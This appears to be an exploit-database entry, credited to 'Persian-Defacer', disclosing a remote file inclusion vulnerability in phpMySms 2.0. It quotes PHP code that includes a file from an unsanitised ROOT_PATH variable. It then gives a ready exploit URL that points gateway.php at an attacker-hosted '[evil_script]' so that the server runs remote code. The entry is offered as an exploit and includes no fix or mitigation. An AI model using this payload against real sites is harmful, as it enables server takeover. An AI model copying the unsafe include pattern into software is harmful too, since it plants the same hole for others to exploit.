id: 543
date: 06/23/2006
title: phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability
author: Persian-Defacer
cves: 

==========================================================
phpMySms 2.0 (ROOT_PATH) Remote File Include Vulnerability
==========================================================




PhpMySms <= V2.0 (ROOT_PATH) Remote File Include Vulnerability
URL : Http://www.phpmysms.com
 
Author=Persian-Defacer
==============================================================
if (($_POST[mode] == "1") or ($_GET[mode] == "1")) {
include ("config.php");
} else {
include ("$ROOT_PATH/config.php");
}
==============================================================


Exploit : http://[site]/[sms location]/sms_config/gateway.php?ROOT_PATH=[evil_script]



#  0day.today [2023-03-26]  #